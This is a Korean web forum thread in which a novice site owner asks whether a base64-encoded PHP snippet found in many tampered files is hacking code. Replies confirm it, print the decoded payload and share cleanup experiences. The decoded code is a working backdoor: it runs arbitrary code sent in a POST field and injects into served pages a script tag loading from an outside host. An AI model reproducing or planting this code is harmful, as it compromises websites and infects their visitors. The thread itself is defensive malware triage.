이게 해킹코드인가요? 정보
이게 해킹코드인가요?본문
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnb3pyM28nKSl7ZnVuY3Rpb24gb3pyM28oJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZyWVdSbGJXbGhMWEJ5ZW1Wa2MzcHJiMnhoYTJFdVpYVXZhVzFoWjJWekwyOXVZWE11Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIG96cjNvMigkYSwkYiwkYywkZCl7Z2xvYmFsJG96cjNvMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkb3pyM28xKSljYWxsX3VzZXJfZnVuYygkb3pyM28xLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdvenIzbycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ296cjNvJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG96cjNvbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignb3pyM28yJykpIT0nb3pyM28yJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
이게 해킹코드인가요?
제테스트홈이 접속이 안되길래 파일점검중 위코드를 발견했는데요...
변조된파일이 하나두개가 아니내요...
이게 해킹코드인가요?
제테스트홈이 접속이 안되길래 파일점검중 위코드를 발견했는데요...
변조된파일이 하나두개가 아니내요...
댓글 전체
네 맞습니다. 확인 결과 다운로드 URL이 유효하지는 않습니다.
다운로드url이라 하심은 무슨말씀이신지???
초짜라서요...처음이고....테스트홈에 웬일인지 원.....
초짜라서요...처음이고....테스트홈에 웬일인지 원.....
뿐만 아니라 이미지 디렉토리에 백도어용 php 파일들도 있습니다.
디코딩결과값입니다.
if(!function_exists('ozr3o')){function ozr3o($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2FrYWRlbWlhLXByemVkc3prb2xha2EuZXUvaW1hZ2VzL29uYXMucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function ozr3o2($a,$b,$c,$d){global$ozr3o1;$s=array();if(function_exists($ozr3o1))call_user_func($ozr3o1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='ozr3o')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ozr3o');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ozr3ol=(($a=@set_error_handler('ozr3o2'))!='ozr3o2')?$a:0;eval(base64_decode($_POST['e']));
======================================================================
PHNjcmlwdCBzcmM9aHR0cDovL2FrYWRlbWlhLXByemVkc3prb2xha2EuZXUvaW1hZ2VzL29uYXMucGhwID48L3NjcmlwdD4=
<script src=http://akademia-przedszkolaka.eu/images/onas.php ></script>
if(!function_exists('ozr3o')){function ozr3o($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2FrYWRlbWlhLXByemVkc3prb2xha2EuZXUvaW1hZ2VzL29uYXMucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function ozr3o2($a,$b,$c,$d){global$ozr3o1;$s=array();if(function_exists($ozr3o1))call_user_func($ozr3o1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='ozr3o')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ozr3o');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ozr3ol=(($a=@set_error_handler('ozr3o2'))!='ozr3o2')?$a:0;eval(base64_decode($_POST['e']));
======================================================================
PHNjcmlwdCBzcmM9aHR0cDovL2FrYWRlbWlhLXByemVkc3prb2xha2EuZXUvaW1hZ2VzL29uYXMucGhwID48L3NjcmlwdD4=
<script src=http://akademia-przedszkolaka.eu/images/onas.php ></script>
저도 비슷한게 걸렸었는데요 ,,,,
주로 index.php index.html config.php 이런파일들에도 죄다 있을겁니다 ....
결국은 악성코드 검사하고(네이버 피시그린으로,,,잡음..) 컴 포맷하고 ,,,호스팅에 연락해서 초기화 했습니다 ..결국 자료 다 날려버렸어요 ,,,ㅠㅠㅠ
이거 코드 지운다고 다 지워도 그담에 또 파일열어보면 또 나오더군요 ,,진짜 악질인듯...
주로 index.php index.html config.php 이런파일들에도 죄다 있을겁니다 ....
결국은 악성코드 검사하고(네이버 피시그린으로,,,잡음..) 컴 포맷하고 ,,,호스팅에 연락해서 초기화 했습니다 ..결국 자료 다 날려버렸어요 ,,,ㅠㅠㅠ
이거 코드 지운다고 다 지워도 그담에 또 파일열어보면 또 나오더군요 ,,진짜 악질인듯...
관리하고 있던 사이트에 들어온적이 있어요.. 몇일동안 계속 삭제삭제.. 모든 파일 날짜별로 보고 수정해주셔야 되요.... 그리고, FTP 사용하는 PC 바이러스 검사도 필...
